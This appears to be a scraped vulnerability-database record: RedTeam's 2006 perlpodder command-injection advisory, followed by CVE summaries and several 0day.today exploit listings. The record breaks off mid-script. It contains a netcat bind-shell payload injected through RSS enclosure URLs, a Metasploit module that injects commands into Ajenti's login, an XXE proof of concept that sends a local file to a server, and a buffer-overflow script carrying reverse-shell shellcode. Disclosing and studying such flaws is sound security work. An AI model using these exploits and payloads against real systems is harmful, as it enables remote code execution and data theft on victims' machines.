RedTeam identified a security flaw in perlpodder which makes it possible
for a malicious podcast server to execute arbitrary shell commands on
the victim's client.
Details
Product: perlpodder
Affected Versions: All versions up to perlpodder-0.4
Fixed Versions: perlpodder-0.5
Vulnerability Type: Remote arbitrary command execution
Security-Risk: high
Vendor-URL: http://perlpodder.sourceforge.net/
Vendor-Status: informed, fixed
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt
Advisory-Status: public
CVE: GENERIC-MAP-NOMATCH
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
Perlpodder is a podcatcher script written in perl. It automates
downloading podcasts.
(from perlpodder SourceForge page)
Podcasting is the distribution of multimedia files over the internet.
Normally, a server is providing an RSS or Atom XML feed describing where
to get the multimedia files. The client parses the feed and may then
download the desired files.
More Details
When perlpodder is used to fetch a podcast, perlpodder will extract the
URL of the audio-file from the XML-file the server provides. The URLs
are saved in the variable "$dlset". There are two occasions in the code
where this variable will be used together with the system() command:
The first usage is with "echo" to log the URL (line 278):
[...]
277 # add urls to log file to mark as retrieved
278 $addurl = "echo " . $dlset . " >> $log_path ";
279 system $addurl;
[...]
The second usage is with "wget" to actually fetch the audio file (line
294):
Unfortunately, $dlset is never properly sanitized, so it is possible for
the remote server to include arbitrary shell commands in the URL which
will then be executed using system() (lines 279 and 302).
Proof of Concept
A minimal malicious server rss feed which exploits the "echo" call may
look as follows:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting Example Malicious Server Feed</title>
The URL above will open port 1337 via netcat on the victim's computer
and bind a shell to it. This is just one example of how to exploit the
vulnerability, as arbitrary commands can be included in the URL, but it
should illustrate the point.
To exploit the "wget" call, the URL just has to be minimally adjusted:
High, because arbitrary shell commands can be executed on the victim's
computer with the privileges of perlpodder (normally the user's
privileges).
History
2006-05-19 Discovery of the problem
2006-05-19 Notification of the author
2006-05-21 Fixed version of perlpodder is released
2006-05-22 Email from author pointing out the release
2006-05-22 Public release of the advisory without CVE
number because of public release by the
author. CVE will be appended when available.
RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a team of specialised IT-security experts.
Hereby, security weaknesses in company networks are uncovered and can be
repaired immediately.
As there are only few experts in this field, RedTeam wants to share its
knowledge and enhance the public knowledge with research in security
related areas. The results are made available as public security
advisories.
More information about RedTeam can be found at
http://www.redteam-pentesting.de.
{"id": "SECURITYVULNS:DOC:12773", "bulletinFamily": "software", "title": "Perlpodder Remote Arbitrary Command Execution", "description": "Advisory: Perlpodder Remote Arbitrary Command Execution\r\n\r\nRedTeam identified a security flaw in perlpodder which makes it possible\r\nfor a malicious podcast server to execute arbitrary shell commands on\r\nthe victim's client.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: perlpodder\r\nAffected Versions: All versions up to perlpodder-0.4\r\nFixed Versions: perlpodder-0.5\r\nVulnerability Type: Remote arbitrary command execution\r\nSecurity-Risk: high\r\nVendor-URL: http://perlpodder.sourceforge.net/\r\nVendor-Status: informed, fixed\r\nAdvisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt\r\nAdvisory-Status: public\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nPerlpodder is a podcatcher script written in perl. It automates\r\ndownloading podcasts.\r\n\r\n(from perlpodder SourceForge page)\r\n\r\nPodcasting is the distribution of multimedia files over the internet.\r\nNormally, a server is providing an RSS or Atom XML feed describing where\r\nto get the multimedia files. The client parses the feed and may then\r\ndownload the desired files.\r\n\r\n\r\nMore Details\r\n============\r\n\r\nWhen perlpodder is used to fetch a podcast, perlpodder will extract the\r\nURL of the audio-file from the XML-file the server provides. The URLs\r\nare saved in the variable "$dlset". There are two occasions in the code\r\nwhere this variable will be used together with the system() command:\r\n\r\nThe first usage is with "echo" to log the URL (line 278):\r\n\r\n[...]\r\n277 # add urls to log file to mark as retrieved\r\n278 $addurl = "echo " . $dlset . " >> $log_path ";\r\n279 system $addurl;\r\n[...]\r\n\r\nThe second usage is with "wget" to actually fetch the audio file (line\r\n294):\r\n\r\n[...]\r\n291 # Prepair to call wget\r\n292\r\n293 $wget_path = "$cwd". "$datadir" ;\r\n294 $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2 \r\n --timeout=20 --random-wait " . $dlset . " -P ". \r\n$wget_path ;\r\n295\r\n296 if ($DEBUG > 0) {\r\n297\r\n298 print "running " . $wget_cmd . "\n" ;\r\n299\r\n300 }\r\n301\r\n302 system $wget_cmd;\r\n[...]\r\n\r\nUnfortunately, $dlset is never properly sanitized, so it is possible for\r\nthe remote server to include arbitrary shell commands in the URL which\r\nwill then be executed using system() (lines 279 and 302).\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nA minimal malicious server rss feed which exploits the "echo" call may\r\nlook as follows:\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<?xml-stylesheet type="text/xsl"?>\r\n<rss version="2.0">\r\n<channel>\r\n <title>RedTeam Pentesting Example Malicious Server Feed</title>\r\n\r\n <item>\r\n <enclosure url="http://www.example.com/example.mp3 >> /dev/null; nc \r\n-e /bin/sh -l -p 1337 &amp;#"\r\n length="241734" type="audio/mpeg" />\r\n </item>\r\n</channel>\r\n</rss>\r\n\r\nThe URL above will open port 1337 via netcat on the victim's computer\r\nand bind a shell to it. This is just one example of how to exploit the\r\nvulnerability, as arbitrary commands can be included in the URL, but it\r\nshould illustrate the point.\r\n\r\nTo exploit the "wget" call, the URL just has to be minimally adjusted:\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<?xml-stylesheet type="text/xsl"?>\r\n<rss version="2.0">\r\n<channel>\r\n <title>RedTeam Pentesting</title>\r\n\r\n <item>\r\n <enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh -l \r\n-p 1337 &amp;#"\r\n length="241734" type="audio/mpeg" />\r\n </item>\r\n</channel>\r\n</rss>\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nDo not use perlpodder with untrusted servers.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpgrade to perlpodder-0.5 immediately[1].\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nHigh, because arbitrary shell commands can be executed on the victim's\r\ncomputer with the privileges of perlpodder (normally the user's\r\nprivileges).\r\n\r\n\r\nHistory\r\n=======\r\n\r\n2006-05-19 Discovery of the problem\r\n2006-05-19 Notification of the author\r\n2006-05-21 Fixed version of perlpodder is released\r\n2006-05-22 Email from author pointing out the release\r\n2006-05-22 Public release of the advisory without CVE\r\n number because of public release by the\r\n author. CVE will be appended when available.\r\n \r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] \r\nhttp://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download\r\n\r\n\r\nRedTeam\r\n=======\r\n\r\nRedTeam Pentesting is offering individual penetration tests, short\r\npentests, performed by a team of specialised IT-security experts.\r\nHereby, security weaknesses in company networks are uncovered and can be\r\nrepaired immediately.\r\n\r\nAs there are only few experts in this field, RedTeam wants to share its\r\nknowledge and enhance the public knowledge with research in security\r\nrelated areas. The results are made available as public security\r\nadvisories.\r\n\r\nMore information about RedTeam can be found at\r\nhttp://www.redteam-pentesting.de.\r\n\r\n-- \r\nRedTeam Pentesting Tel.: +49-(0)241-963 1300\r\nDennewartstr. 25-27 Fax : +49-(0)241-963 1304\r\n52068 Aachen http://www.redteam-pentesting.de", "published": "2006-05-23T00:00:00", "modified": "2006-05-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12773", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:17", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "dce5ea449568b0dddcf7a45c21a9fea8"}, {"key": "href", "hash": "24868d491086565acb475f432b6c209f"}, {"key": "modified", "hash": "60335d64e4a0c87d3f83d935babc3510"}, {"key": "published", "hash": "60335d64e4a0c87d3f83d935babc3510"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "f723bf23511ea193b076402225ae1340"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "b3b47b3730f74be1e6a25d9a87a66385c652a8e09a6679828750de34c009587a", "viewCount": 2, "enchantments": {"score": {"value": 3.5, "vector": "NONE", "modified": "2018-08-31T11:10:17"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1"]}, {"type": "ubuntu", "idList": ["USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "zdt", "idList": ["1337DAY-ID-32799", "1337DAY-ID-32772", "1337DAY-ID-32775", "1337DAY-ID-32771", "1337DAY-ID-32767", "1337DAY-ID-32754", "1337DAY-ID-32753", "1337DAY-ID-32757", "1337DAY-ID-32725", "1337DAY-ID-32724"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152997"]}, {"type": "kitploit", "idList": ["KITPLOIT:3928947731225997712"]}], "modified": "2018-08-31T11:10:17"}, "vulnersScore": 3.5}, "objectVersion": "1.3", "affectedSoftware": []}
{"cve": [{"lastseen": "2019-12-11T14:57:12", "bulletinFamily": "NVD", "description": "mod_wsgi module before 3.4 for Apache, when used in embedded mode, might allow remote attackers to obtain sensitive information via the Content-Type header which is generated from memory that may have been freed and then overwritten by a separate thread.", "modified": "2019-12-10T02:13:00", "id": "CVE-2014-0242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0242", "published": "2019-12-09T20:15:00", "title": "CVE-2014-0242", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T14:54:55", "bulletinFamily": "NVD", "description": "chrony before 1.31.1 does not properly protect state variables in authenticated symmetric NTP associations, which allows remote attackers with knowledge of NTP peering to cause a denial of service (inability to synchronize) via random timestamps in crafted NTP data packets.", "modified": "2019-12-09T19:22:00", "id": "CVE-2015-1853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1853", "published": "2019-12-09T19:15:00", "title": "CVE-2015-1853", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T14:58:34", "bulletinFamily": "NVD", "description": "An SQL Injection vulnerability exists in MiniDLNA prior to 1.1.0", "modified": "2019-12-10T15:47:00", "id": "CVE-2013-2745", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2745", "published": "2019-12-04T22:15:00", "title": "CVE-2013-2745", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-03T17:07:13", "bulletinFamily": "NVD", "description": "FreeBSD: Input Validation Flaw allows local users to gain elevated privileges", "modified": "2019-12-02T18:38:00", "id": "CVE-2012-4576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4576", "published": "2019-12-02T18:15:00", "title": "CVE-2012-4576", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:04:16", "bulletinFamily": "NVD", "description": "Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.", "modified": "2019-12-02T18:38:00", "id": "CVE-2014-9356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9356", "published": "2019-12-02T18:15:00", "title": "CVE-2014-9356", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:34", "bulletinFamily": "NVD", "description": "The mpi_powm function in Libgcrypt before 1.6.3 and GnuPG before 1.4.19 allows attackers to obtain sensitive information by leveraging timing differences when accessing a pre-computed table during modular exponentiation, related to a \"Last-Level Cache Side-Channel Attack.\"", "modified": "2019-12-02T13:37:00", "id": "CVE-2015-0837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0837", "published": "2019-11-29T22:15:00", "title": "CVE-2015-0837", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-07T11:40:06", "bulletinFamily": "NVD", "description": "Libgcrypt before 1.6.3 and GnuPG before 1.4.19 does not implement ciphertext blinding for Elgamal decryption, which allows physically proximate attackers to obtain the server's private key by determining factors using crafted ciphertext and the fluctuations in the electromagnetic field during multiplication.", "modified": "2019-12-05T18:06:00", "id": "CVE-2014-3591", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3591", "published": "2019-11-29T22:15:00", "title": "CVE-2014-3591", "type": "cve", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-03T17:08:36", "bulletinFamily": "NVD", "description": "cabextract before 1.6 does not properly check for leading slashes when extracting files, which allows remote attackers to conduct absolute directory traversal attacks via a malformed UTF-8 character that is changed to a UTF-8 encoded slash.", "modified": "2019-12-02T13:37:00", "id": "CVE-2015-2060", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2060", "published": "2019-11-29T21:15:00", "title": "CVE-2015-2060", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:37", "bulletinFamily": "NVD", "description": "The PGP signature parsing in Module::Signature before 0.74 allows remote attackers to cause the unsigned portion of a SIGNATURE file to be treated as the signed portion via unspecified vectors.", "modified": "2019-12-02T13:37:00", "id": "CVE-2015-3406", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3406", "published": "2019-11-29T21:15:00", "title": "CVE-2015-3406", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:35", "bulletinFamily": "NVD", "description": "verify_certificate_identity in the OpenSSL extension in Ruby before 2.0.0 patchlevel 645, 2.1.x before 2.1.6, and 2.2.x before 2.2.2 does not properly validate hostnames, which allows remote attackers to spoof servers via vectors related to (1) multiple wildcards, (1) wildcards in IDNA names, (3) case sensitivity, and (4) non-ASCII characters.", "modified": "2019-12-02T13:37:00", "published": "2019-11-29T21:15:00", "id": "CVE-2015-1855", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1855", "title": "CVE-2015-1855", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2019-12-04T16:04:29", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a command injection in Ajenti version 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.", "modified": "2019-12-03T00:00:00", "published": "2019-12-03T00:00:00", "id": "1337DAY-ID-33620", "href": "https://0day.today/exploit/description/33620", "title": "Ajenti 2.1.31 Command Injection Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ajenti auth username Command Injection',\r\n 'Description' => %q{\r\n This module exploits a command injection in Ajenti == 2.1.31.\r\n By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.\r\n },\r\n 'Author' => [\r\n 'Jeremy Brown', # Vulnerability discovery\r\n 'Onur ER <[email\u00a0protected]>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['EDB', '47497']\r\n ],\r\n 'DisclosureDate' => '2019-10-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'python',\r\n 'Arch' => ARCH_PYTHON,\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n ['Ajenti == 2.1.31', {}]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8000,\r\n 'SSL' => true,\r\n 'payload' => 'python/meterpreter/reverse_tcp'\r\n },\r\n 'DefaultTarget' => 0\r\n ))\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => '/view/login/normal'\r\n })\r\n\r\n unless res\r\n vprint_error 'Connection failed'\r\n return CheckCode::Unknown\r\n end\r\n\r\n unless res.body =~ /ajenti/i\r\n return CheckCode::Safe\r\n end\r\n\r\n version = res.body.scan(/'ajentiVersion', '([\\d\\.]+)'/).flatten.first\r\n\r\n if version\r\n vprint_status \"Ajenti version #{version}\"\r\n end\r\n\r\n if version == '2.1.31'\r\n return CheckCode::Appears\r\n end\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n print_status('Exploiting...')\r\n json_body = { 'username' => \"`python -c \\\"#{payload.encoded}\\\"`\",\r\n 'password' => rand_text_alpha_lower(7),\r\n 'mode' => 'normal'\r\n }\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),\r\n 'ctype' => 'application/json',\r\n 'data' => JSON.generate(json_body)\r\n })\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33620"}, {"lastseen": "2019-12-04T14:10:38", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33612", "href": "https://0day.today/exploit/description/33612", "title": "Visual Studio 2008 - XML External Entity Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Visual Studio 2008 - XML External Entity Injection\r\n# Discovery by: hyp3rlinx\r\n# Date: 2019-12-02\r\n# Vendor Homepage: www.microsoft.com\r\n# Software Link: Visual Studio 2008 Express IDE \r\n# Tested Version: 2008\r\n# CVE: N/A\r\n\r\n[+] Credits: John Page (aka hyp3rlinx)\t\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt\r\n[+] ISR: ApparitionSec \r\n\r\n\r\n[Vendor]\r\nwww.microsoft.com\r\n\r\n\r\n[Product]\r\nVisual Studio 2008 Express IDE \r\nvcsetup.exe\r\nFile hash: 62f764849e8fcdf8bfbc342685641304\r\nDownload: http://go.microsoft.com/?linkid=7729279\r\n\r\n\r\n[Vulnerability Type]\r\nXML External Entity Injection 0Day\r\n\r\n\r\n[CVE Reference]\r\nN/A\r\n\r\n\r\n[Security Issue]\r\nVisual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.\r\nBy opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the\r\nremote attackers server. \r\n\r\nDouble click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get \r\nassociated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.\r\n\r\n[Vuln XXE file types]\r\n.snippet\r\n.i\r\n.s\r\n.asm\r\n.disco\r\n.lst\r\n.inc\r\n.srf\r\n.wsdl\r\n.rgs\r\n.xml\r\n\r\nThis IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.\r\n\r\n\r\n[References]\r\nhttps://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/\r\n\r\n\r\n[Exploit/POC]\r\n\"Evil.snippet\" or any of the extensions mentioned above.\r\n\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE knobgobslob [ \r\n<!ENTITY % file SYSTEM \"C:\\Windows\\system.ini\">\r\n<!ENTITY % dtd SYSTEM \"http://127.0.0.1:8000/payload.dtd\">\r\n%dtd;]>\r\n<pwn>&send;</pwn>\r\n\r\n\r\n\"payload.dtd\"\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>\">\r\n%all;\r\n\r\n\r\npython -m SimpleHTTPServer\r\npython -m http.server (Python3)\r\n\r\n\r\n[POC Video URL]\r\nhttps://www.youtube.com/watch?v=QOZlwzsbPrk\r\n\r\n\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33612"}, {"lastseen": "2019-12-04T02:04:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33614", "href": "https://0day.today/exploit/description/33614", "title": "Anviz CrossChex 4.3.12 - Local Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow\r\n# Exploit Author: Luis Catarino & Pedro Rodrigues\r\n# Vendor Homepage: https://www.anviz.com/\r\n# Software Link: https://www.anviz.com/download.html\r\n# Version: Crosschex Standard x86 <= V4.3.12\r\n# Tested on: 4.3.8.0, 4.3.12\r\n# CVE : N/A\r\n# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html\r\n\r\nimport socket\r\nimport time\r\nimport sys\r\nimport binascii\r\n\r\n# Scapy for the broadcast packet with custom sport\r\nfrom scapy.all import Raw,IP,Dot1Q,UDP,Ether\r\nimport scapy.all\r\n\r\n# shellcode working calc.exe\r\ncalculator_payload = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\ncalculator_payload += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\ncalculator_payload += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\ncalculator_payload += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\ncalculator_payload += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\ncalculator_payload += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\ncalculator_payload += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\ncalculator_payload += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\ncalculator_payload += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\ncalculator_payload += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\ncalculator_payload += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\ncalculator_payload += b\"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\ncalculator_payload += b\"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\ncalculator_payload += b\"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\ncalculator_payload += b\"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n\r\n# shellcode windows x86 reverse_shell\r\nshell_payload_1 = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\nshell_payload_1 += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nshell_payload_1 += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nshell_payload_1 += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nshell_payload_1 += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nshell_payload_1 += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nshell_payload_1 += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nshell_payload_1 += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nshell_payload_1 += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nshell_payload_1 += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nshell_payload_1 += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\r\nshell_payload_1 += b\"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\r\nshell_payload_1 += b\"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\r\nshell_payload_1 += b\"\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\"\r\nshell_payload_1 += b\"\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x05\\x68\"\r\n\r\n# shellcode windows x86 reverse_shell (part_2)\r\nshell_payload_2 = b\"\\x68\\x02\\x00\\x01\\xbd\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\r\nshell_payload_2 += b\"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0c\\xff\\x4e\\x08\\x75\\xec\"\r\nshell_payload_2 += b\"\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x68\\x63\\x6d\\x64\\x00\\x89\"\r\nshell_payload_2 += b\"\\xe3\\x57\\x57\\x57\\x31\\xf6\\x6a\\x12\\x59\\x56\\xe2\\xfd\\x66\"\r\nshell_payload_2 += b\"\\xc7\\x44\\x24\\x3c\\x01\\x01\\x8d\\x44\\x24\\x10\\xc6\\x00\\x44\"\r\nshell_payload_2 += b\"\\x54\\x50\\x56\\x56\\x56\\x46\\x56\\x4e\\x56\\x56\\x53\\x56\\x68\"\r\nshell_payload_2 += b\"\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x89\\xe0\\x4e\\x56\\x46\\xff\\x30\"\r\nshell_payload_2 += b\"\\x68\\x08\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x68\"\r\nshell_payload_2 += b\"\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\nshell_payload_2 += b\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\"\r\n\r\ndef ipToShellcode(ip):\r\n a = ip.split('.')\r\n b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))\r\n b = b.replace(\"0x\",\"\")\r\n return binascii.unhexlify(b)\r\n\r\n# sport has to be 5060\r\ndef sendFuzzingUDPBroadcast(ip=\"255.255.255.255\", sport=5050, dport=5060):\r\n request = b\"A\"*77 # Original payload substitute\r\n request += b\"B\"*184\r\n request += b\"\\x07\\x18\\x42\\x00\" # EIP - 00421807 crosscheck_standard.exe\r\n request += b\"A\"*4\r\n # 269 bytes\r\n\r\n if len(sys.argv) > 2:\r\n request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2\r\n else:\r\n request = request + calculator_payload\r\n\r\n scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst=\"ff:ff:ff:ff:ff:ff\")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )\r\n\r\ndef setFuzzUDPServer(ip='', port=5050, timeout=150):\r\n try :\r\n \ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n except:\r\n \tprint('[!] Failed to create server socket')\r\n\r\n try:\r\n \ts.bind(('', port))\r\n except:\r\n \tprint('[*] Server socket bind failed')\r\n \tsys.exit()\r\n\r\n print('[*] Waiting for crosschex')\r\n s.settimeout(timeout)\r\n timeout 